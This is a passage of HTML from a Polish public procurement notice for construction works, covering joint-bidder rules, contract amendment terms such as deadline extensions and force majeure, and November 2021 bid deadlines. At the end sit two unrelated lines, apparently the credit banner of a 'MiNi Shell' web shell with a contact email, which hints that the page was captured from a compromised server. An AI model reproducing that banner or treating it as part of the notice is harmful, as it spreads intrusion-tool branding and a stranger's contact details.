wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w ofercie składa oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy może nastąpić w formie pisemnej przy zachowaniu<br/>wymogów ustawy z dn. 11 września 2019 Prawo zamówień publicznych (t.j. Dz. U. z 2021 r.,<br/>poz. 1129) zgodnie ze Specyfikacją Warunków Zamówienia. Zakazuje się istotnych zmian<br/>umowy.<br/>2. Zamawiający przewiduje zmiany postanowień umowy, w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru oferty, z zastrzeżeniem, że zmiana umowy może nastąpić<br/>wyłącznie za zgodą obydwu Stron wyrażoną na piśmie pod rygorem nieważności, jeżeli służyć<br/>będzie należytemu wykonaniu umowy.<br/>3. Zamawiający zastrzega możliwość wprowadzenia zmian postanowień zawartej umowy. W<br/>szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na<br/>następujących warunkach:<br/>1) Strony mają prawo do przedłużenia terminu wykonania Przedmiotu umowy, o którym mowa w<br/>§ 2 umowy, z powodu przyczyn niezawinionych przez Wykonawcę określonych poniżej:<br/>a) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe<br/>organy: administracji państwowej, samorządowej, które nie są następstwem okoliczności, za<br/>które Wykonawca ponosi odpowiedzialność; w szczególności dotyczy to następujących sytuacji:<br/>- opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy<br/>są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w<br/>przepisach prawa na dokonanie czynności,<br/>- odmowy wydania przez organy decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji<br/>projektowej;<br/>b) gdy wystąpią warunki atmosferyczne odbiegające od typowych dla danej pory roku, w szczególności nieprzewidziane warunki pogodowe uniemożliwiające prowadzenie robót<br/>budowlanych, przeprowadzenie prób i sprawdzeń, dokonanie odbiorów (powodzie, długotrwałe<br/>ciągłe opady atmosferyczne, klęski żywiołowe i inne nietypowe dla danej pory roku anomalie<br/>pogodowe);<br/>c) jeżeli wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy;<br/>d)wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu umowy zgodnie z jej<br/>postanowieniami; przez siłę wyższą należy rozumieć zdarzenie zewnętrzne o charakterze<br/>niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem umowy, oraz<br/>którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej<br/>staranności; za siłę wyższą, warunkująca zmianę Umowy uważać się będzie w szczególności:<br/>powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania<br/>wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii<br/>elektrycznej, promieniowanie lub skażenia, jak również stan epidemii;<br/>e) zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z<br/>Przedmiotem umowy i nieprzewidywalnych, których niewykonanie uniemożliwia lub utrudnia<br/>prawidłowe wykonanie Przedmiotu umowy; zamiana terminu może obejmować maksymalnie czas niezbędny do wykonania tych robót; .... cd we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy https://platformazakupowa.pl/pn/zgl_mikolow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-16 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com